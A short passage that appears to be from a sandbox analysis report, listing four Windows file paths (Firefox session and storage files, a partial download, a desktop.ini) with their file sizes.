                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore.jsonlz4

                                                                                                    Filesize

                                                                                                    909B

                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                    Filesize

                                                                                                    184KB

                                                                                                  • C:\Users\Admin\Downloads\Unconfirmed 284260.crdownload

                                                                                                    Filesize

                                                                                                    5.5MB

                                                                                                  • C:\Users\Admin\Videos\Captures\desktop.ini

                                                                                                    Filesize

                                                                                                    190B
